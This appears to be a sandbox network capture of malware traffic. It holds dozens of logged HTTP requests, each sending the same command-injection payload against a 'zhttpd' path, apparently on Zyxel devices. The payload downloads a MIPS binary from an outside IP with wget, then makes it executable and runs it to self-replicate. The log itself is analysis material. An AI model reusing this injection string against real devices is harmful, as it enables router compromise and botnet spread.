                                                Jan 12, 2024 18:24:53.287476063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8945192.168.2.135703276.223.63.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287544012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8946192.168.2.134040824.14.112.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287581921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8947192.168.2.135972647.236.19.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287664890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8948192.168.2.13502781.193.101.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287698030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8949192.168.2.1348018204.255.217.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287755013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8950192.168.2.1334606162.219.136.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287805080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8951192.168.2.1342418192.249.60.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287832975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8952192.168.2.1342294202.33.209.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287920952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8953192.168.2.133667834.230.238.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.287986040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8954192.168.2.1347396189.34.44.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288012981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8955192.168.2.136096886.140.128.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288054943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8956192.168.2.1342620133.4.141.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288117886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8957192.168.2.133902489.89.255.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288157940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8958192.168.2.134289044.194.196.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288208961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8959192.168.2.135112241.107.216.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288249016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8960192.168.2.1347632223.248.87.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288311958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8961192.168.2.134862696.14.101.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288368940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8962192.168.2.1354122204.151.34.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288410902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8963192.168.2.134457068.74.77.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288477898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8964192.168.2.13605301.167.152.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288521051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8965192.168.2.1359104102.163.206.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288590908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8966192.168.2.134363269.225.255.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288640976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8967192.168.2.1348920168.146.72.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288706064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8968192.168.2.133339214.158.97.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288749933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8969192.168.2.133514275.118.238.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288804054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8970192.168.2.1346500137.177.5.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288862944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8971192.168.2.1351006119.112.109.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288927078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8972192.168.2.1347768213.249.199.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.288990974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8973192.168.2.133353023.215.48.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289041042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8974192.168.2.136077212.21.141.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289098978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8975192.168.2.13425284.117.222.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289158106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8976192.168.2.135187866.10.99.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289251089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8977192.168.2.1332988201.15.173.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289278984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8978192.168.2.1354914190.73.218.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289346933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8979192.168.2.133396279.28.73.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289407969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8980192.168.2.1354218162.98.75.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289470911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8981192.168.2.1337880170.225.236.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289495945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8982192.168.2.135670825.91.199.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289561033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8983192.168.2.134462465.61.214.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.289640903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8984192.168.2.1356860172.171.161.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294475079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8985192.168.2.13375589.175.112.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294521093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8986192.168.2.13512328.70.30.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294606924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8987192.168.2.1334730165.113.27.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294667006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8988192.168.2.1344318171.81.98.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294706106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8989192.168.2.135821439.39.129.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:53.294770002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8990192.168.2.1338092191.95.38.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303452969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8991192.168.2.135384085.201.147.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303499937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8992192.168.2.1334286193.89.67.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303561926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8993192.168.2.135201441.134.69.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303630114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8994192.168.2.1356976221.32.140.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303694010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8995192.168.2.1348694183.82.191.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303746939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8996192.168.2.1349974217.130.132.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303812027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8997192.168.2.1345160163.219.225.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303845882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8998192.168.2.1338384140.151.142.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303913116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8999192.168.2.134419074.5.169.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.303951979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9000192.168.2.1345320172.188.104.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304003000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9001192.168.2.1354550160.204.232.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304023027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9002192.168.2.133476020.146.105.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304091930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9003192.168.2.134912077.33.5.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304158926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9004192.168.2.135985267.160.178.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304182053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9005192.168.2.133614444.93.99.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304224014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9006192.168.2.1343446136.252.145.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:54.304282904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9007192.168.2.135876027.104.136.242443
                                                TimestampBytes transferredDirectionData
